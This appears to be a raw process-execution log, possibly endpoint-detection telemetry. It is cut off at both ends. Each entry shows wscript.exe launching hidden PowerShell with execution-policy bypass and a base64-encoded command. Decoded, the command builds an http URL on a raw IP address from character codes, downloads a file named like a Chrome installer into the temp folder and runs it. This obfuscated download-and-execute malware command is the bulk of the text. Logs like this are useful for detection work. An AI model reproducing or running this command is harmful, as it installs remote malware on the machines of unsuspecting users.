kACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g
parent_process wscript.exe martian_process "C:\Windows\SYSTeM32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe" "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
parent_process wscript.exe martian_process C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJA